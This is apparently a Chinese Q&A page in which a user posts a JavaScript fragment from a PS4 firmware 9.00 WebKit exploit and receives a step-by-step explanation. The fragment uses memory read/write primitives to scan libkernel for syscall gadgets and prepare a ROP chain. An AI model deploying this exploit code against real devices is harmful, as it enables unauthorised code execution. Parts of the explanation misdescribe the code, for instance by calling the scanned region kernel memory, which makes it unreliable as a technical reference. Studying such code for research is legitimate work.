var kview = new Uint8Array(0x1000); var kstr = p.leakval(kview).add32(0x10); var orig_kview_buf = p.read8(kstr); p.write8(kstr, window.libKernelBase); p.write4(kstr.add32(8), 0x40000); var countbytes; for (var i = 0; i < 0x40000; i++) { if (kview[i] == 0x72 && kview[i + 1] == 0x64 && kview[i + 2] == 0x6c && kview[i + 3] == 0x6f && kview[i + 4] == 0x63) { countbytes = i; break; } } p.write4(kstr.add32(8), countbytes + 32); var dview32 = new Uint32Array(1); var dview8 = new Uint8Array(dview32.buffer); for (var i = 0; i < countbytes; i++) { if (kview[i] == 0x48 && kview[i + 1] == 0xc7 && kview[i + 2] == 0xc0 && kview[i + 7] == 0x49 && kview[i + 8] == 0x89 && kview[i + 9] == 0xca && kview[i + 10] == 0x0f && kview[i + 11] == 0x05) { dview8[0] = kview[i + 3]; dview8[1] = kview[i + 4]; dview8[2] = kview[i + 5]; dview8[3] = kview[i + 6]; var syscallno = dview32[0]; window.syscalls[syscallno] = window.libKernelBase.add32(i); } } p.write8(kstr, orig_kview_buf); chain = new rop(); //Sanity check if (chain.syscall(20).low == 0) { alert("webkit exploit failed. Try again if your ps4 is on fw 9.00."); while (1); } }请继续解释以上代码?
时间: 2024-04-18 19:33:51 浏览: 80
kview - 信号/数据易于可视化和处理的界面:KView 是帮助信号/数据管理的 GUI。-matlab开发
以上代码的目的是利用漏洞进行内核的漏洞利用。下面对代码进行解释:
1. 创建一个大小为0x1000的Uint8Array数组对象 `kview`,用于读取内核内存。
2. 通过 `leakval()` 函数获取 `kview` 数组对象的地址,并加上偏移量0x10,得到 `kstr` 的地址。
3. 使用 `p.read8()` 函数读取 `kstr` 地址处的值,即原始的 `kview` 缓冲区对象的地址,并将其保存在 `orig_kview_buf` 中。
4. 修改 `kstr` 的值为 `window.libKernelBase`,即将 `kview` 缓冲区对象的地址替换为 `libKernelBase` 的地址。
5. 将 `0x40000` 写入 `kstr` 地址偏移8字节处,即设置 `kview` 缓冲区大小为 0x40000 字节。
6. 通过遍历 `kview` 缓冲区,查找特定的字节序列('rdloc')来计算字节数,并将结果保存在 `countbytes` 变量中。
7. 将 `countbytes + 32` 写入 `kstr` 地址偏移8字节处,即设置 `kview` 缓冲区大小为 `countbytes + 32` 字节,留出足够的空间存储ROP链。
8. 创建一个 Uint32Array 数组对象 `dview32` 和一个对应的 Uint8Array 数组对象 `dview8`,用于处理字节序列。
9. 再次遍历 `kview` 缓冲区,查找特定的字节序列(syscall指令),并将其解析为系统调用号。然后,将系统调用号与对应的内核地址存储到全局对象 `window.syscalls` 中。
10. 将 `orig_kview_buf` 的值写回 `kstr` 地址处,恢复原始的 `kview` 缓冲区对象的地址。
11. 创建一个 `rop()` 对象 `chain`,用于构建ROP链。
12. 进行一个健全性检查,通过调用 `chain.syscall(20)` 来检查漏洞利用是否成功。如果返回值为0,则表示利用失败,弹出警告消息并进入无限循环。
总体而言,以上代码利用了漏洞来读取内核内存、计算字节数,并解析系统调用号。最后,使用构建的ROP链进行漏洞利用,并进行健全性检查。
阅读全文